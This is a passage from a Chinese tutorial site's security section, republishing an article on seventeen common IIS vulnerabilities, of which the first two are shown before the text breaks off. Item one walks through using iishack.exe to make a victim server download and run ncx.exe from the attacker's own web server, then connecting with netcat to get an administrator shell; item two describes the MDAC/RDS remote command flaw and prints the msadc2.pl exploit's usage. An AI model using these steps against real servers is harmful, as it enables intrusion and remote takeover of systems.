当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > IIS的十七个常见漏洞

安全防护
利用IIS日志追查网站入侵者(1)
利用IIS日志追查网站入侵者(2)
防御额外访问量带来的拒绝服务式攻击
用SSL加密增强FTP服务器安全性
Web网站安全需澄清五个误解
多服务器的日志合并统计(1)
多服务器的日志合并统计(2)
多服务器的日志合并统计(3)
数据库安全:SQL Server 中系统表的作用
2003服务器A级BT安全配置指南(1)
2003服务器A级BT安全配置指南(2)
2003服务器A级BT安全配置指南(3)
2003服务器A级BT安全配置指南(4)
2003服务器A级BT安全配置指南(5)
2003服务器A级BT安全配置指南(6)
2003服务器A级BT安全配置指南(7)
2003服务器A级BT安全配置指南(8)
2003服务器A级BT安全配置指南(9)
2003服务器A级BT安全配置指南(10)
2003服务器A级BT安全配置指南(11)

安全防护 中的 IIS的十七个常见漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 43 ::
收藏到网摘: n/a

1. iis4hack缓冲溢出  
     主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序  在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器: 
                 
 c:>iishack.exe <victim> 80 <your web server>/ncx.exe 
                  
然后你就使用netcat来连接你要检测的服务器: 
                  
c:>nc <victim> 80  
 如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip 
                 
 2.msadc  
     IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help 
                  [quack@chat quack]$ perl msadc2.pl -h 
                  -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- 
                  Usage: msadc.pl -h <host> { -d <delay> -X -v } 
                  -h <host> = host you want to scan (ip or domain) 
                  -d <seconds> = delay between calls, default 1 second 
                  -X = dump Index Server path table, if available 
                  -N = query VbBusObj for NetBIOS name 
                  -V = use VbBusObj instead of ActiveDataFactory 
                  -v = verbose 
                  -e = external dictionary file for step 5 
                  -u <\hostsharefile> = use UNC file 
                  -w = Windows 95 instead of Windows NT 
                  -c = v1 compatibility (three step